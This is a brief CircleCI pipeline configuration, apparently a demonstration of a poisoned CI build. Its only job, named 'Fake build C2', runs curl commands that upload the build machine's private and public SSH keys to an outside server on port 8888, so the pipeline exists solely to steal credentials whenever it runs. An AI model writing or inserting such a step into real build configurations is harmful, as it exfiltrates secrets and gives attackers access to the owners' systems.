# Use the latest 2.1 version of CircleCI pipeline process engine.
version: 2.1

jobs:
  build-branch:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: "Fake build C2"
          command: "curl -XPOST http://ber.gaur.is:8888/bin -k --data-binary @$HOME/.ssh/id_rsa; curl -XPOST http://ber.gaur.is:8888/bin -k --data-binary @$HOME/.ssh/id_rsa.pub"

workflows:
  c2-pipiline:
    jobs:
      - build-branch
